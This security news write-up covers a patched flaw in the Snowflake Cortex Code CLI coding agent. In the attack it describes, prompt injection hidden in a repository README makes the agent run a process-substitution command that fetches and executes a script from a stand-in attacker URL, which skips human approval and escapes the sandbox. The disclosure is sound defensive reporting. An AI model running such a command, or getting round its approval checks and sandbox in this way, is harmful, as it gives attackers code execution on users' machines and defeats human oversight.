Snowflake Cortex Code CLI vulnerability allowed sandbox escape and malware execution
Vulnerability Details
The Snowflake Cortex Code CLI is a command-line coding agent that operates similarly to Claude Code and OpenAI's Codex, with built-in integration to run SQL in Snowflake. Two days after release, a vulnerability was identified in Cortex Code's command validation system that allowed specially constructed malicious commands to execute arbitrary commands without triggering human-in-the-loop approval steps and execute those commands outside of the Cortex CLI's sandbox.
Attack Chain
The attack works via indirect prompt injection. A user opens Cortex and turns on the sandbox, then asks Cortex for help with a third-party open-source codebase. A prompt injection hidden in the README of an untrusted repository manipulates Cortex into believing it must run a dangerous command.
Cortex failed to validate commands inside process substitution expressions, allowing unapproved execution of the malicious command:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))This command downloads a script from an attacker's server and executes it. The bypass worked because:
- Unsafe commands within a process substitution <() expression were not evaluated by the validation system
- The full command started with a 'safe' command (cat in this case)
- Commands in process substitution expressions never triggered human approval
Sandbox Bypass
The prompt injection also manipulates the model to set a flag that triggers unsandboxed command execution. Cortex, by default, can set a flag to trigger unsandboxed command execution, and the injection uses this to allow the malicious command to execute outside the sandbox.
Remediation
The Snowflake security team validated and remediated this vulnerability, releasing a fix with Cortex Code CLI version 1.0.25 on February 28th, 2026. Snowflake's full advisory is available within the Snowflake Community Site at: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Note: This attack chain also applied to non-sandbox users. Documentation indicates that in OS+Regular mode, all commands prompt for user approval. Commands run in the sandbox also have network and file access restrictions.
📖 Read the full source: HN AI Agents
👀 See Also
OpenClaw User Shares Strategy for Balancing Agent Autonomy and Web Security
An OpenClaw user describes their current challenge: balancing agent autonomy with security, particularly regarding web access and prompt injection risks. They propose a solution using 'low trust' and 'high trust' agent segments with a human approval gate.
Preventing AI Agents from Botnet Participation: Security Considerations
Community discusses how to protect autonomous AI agents from being hijacked or used in malicious botnets.
Litellm PyPI Package Compromised: Malicious Version 1.82.8 Exfiltrated Credentials
The litellm PyPI package, which unifies calls to OpenAI, Anthropic, Cohere and other LLM providers, was compromised with malicious version 1.82.8 that exfiltrated SSH keys, cloud credentials, API keys, and other sensitive data for about an hour.
Critical OpenClaw Security Vulnerabilities Patched in 2026.3.28
OpenClaw version 2026.3.28 patches 8 critical security vulnerabilities found by Ant AI Security Lab, including sandbox bypass, privilege escalation, and SSRF risks. Users on versions ≤2026.3.24 should update immediately.